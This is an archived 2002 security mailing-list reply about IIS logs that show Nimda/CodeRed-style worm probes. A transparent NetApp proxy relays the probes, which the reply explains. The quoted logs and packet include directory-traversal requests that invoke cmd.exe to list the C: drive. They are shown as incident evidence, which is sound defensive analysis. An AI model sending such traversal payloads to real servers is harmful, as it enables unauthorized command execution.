On Wed, Jun 26, 2002 at 10:18:36AM -0400, Maxime Ducharme wrote: > 2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET > /winnt/system32/cmd.exe /c+dir+c:\ 404 2526 206 0 HTTP/1.1 > 65.94.25.135 - - - > 2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET > /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 404 2526 209 0 HTTP/1.1 > 65.94.25.135 - - - > > Sent packet show : > > GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ HTTP/1.1 > Host: 65.94.25.135 > Connection: keep-alive > Accept: */* > X-Forwarded-For: 212.179.220.111 > Via: 1.1 proxy2 (NetCache NetApp/5.2.1R1D3) > > The proxy is relaying itself ? not much sense > The worm generated header on-the-fly ? The NetCache proxyserver is a Hardware-base proxyserver from NetApp which usually runs in transparent mode. Thus also proxying nimda/codered runs. -- Cliff Albert | RIPE: CA3348-RIPE | http://oisec.net/ cliffat_private | 6BONE: CA2-6BONE | ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Jun 27 2002 - 10:02:30 PDT